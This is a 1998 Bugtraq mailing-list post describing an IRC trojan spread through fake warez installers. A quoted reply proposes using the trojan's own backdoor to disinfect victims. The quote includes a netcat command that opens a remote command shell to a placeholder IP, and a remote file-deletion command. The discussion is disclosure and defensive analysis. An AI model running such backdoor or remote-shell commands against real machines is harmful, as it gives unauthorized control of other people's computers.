Bugtraq mailing list archives
Re: Internet Wide DOS Attack using IRC
From: cluster () VIDEOTRON CA (Samuel Cossette)
Date: Sat, 3 Oct 1998 14:41:54 -0400
It's not the DO command of mirc, it's a buildin command, it's the equivalent of /QUOTE or /RAW in a irc client, this is send the data directly to the server At this time I have found 2 directly file infected: Packet Handler Firewall and FlashFXP v1.0, both distributed on a XDCC bot on #warez950-dcc. In a zip file with some fake .nfo and a SETUP.EXE (oce.exe) of 354k. quicktools.ocx (EZFTP OLE Control Module), Mswinsck.ocx are also included. Another interesting thing, the server open the port 15150, this is prompt: Enter your username:, probably a FTPD The trojan can also modify you mirc.ini, this is add auto-op, and modify your current script.
With the DO command enabled, they gave us the means to remotely disable this trojan. Something to the effect of; msg <nick> .do del c:\windows\system\oce*.* Then, msg <nick> .do <some evil command to lock up the machine, forcing a reboot>.
...
The mIRC DO command is very powerful, and can be used to install netcat on the remote machine. We could then .msg <nick> <path to netcat>\nc.exe -L -p <any port> <your ip> -t -e command.com, giving a remote command prompt to investigate/disinfect the machine. ___________________________________________________________________________
___
George Imburgia e-mail:
gti () hopi dtcc edu
Systems Administrator Phone: (302)739-4068 Delaware Technical & Community College Fax: (302)739-3345 Office of the President Pager: (302)741-5962
Samuel Cossette cluster () videotron ca
Current thread:
- Re: Internet Wide DOS Attack using IRC Paralyse (Oct 02)
- <Possible follow-ups>
- Re: Internet Wide DOS Attack using IRC Samuel Cossette (Oct 02)
- Re: Internet Wide DOS Attack using IRC Kameron Gasso (Oct 02)
- Re: Internet Wide DOS Attack using IRC Glenn Tucker (Oct 02)
- Re: Internet Wide DOS Attack using IRC Diane Bruce (Oct 02)
- Re: Internet Wide DOS Attack using IRC George Imburgia (Oct 03)
- Re: Internet Wide DOS Attack using IRC Kameron Gasso (Oct 02)
- Re: Internet Wide DOS Attack using IRC Samuel Cossette (Oct 02)
- Re: Internet Wide DOS Attack using IRC Samuel Cossette (Oct 03)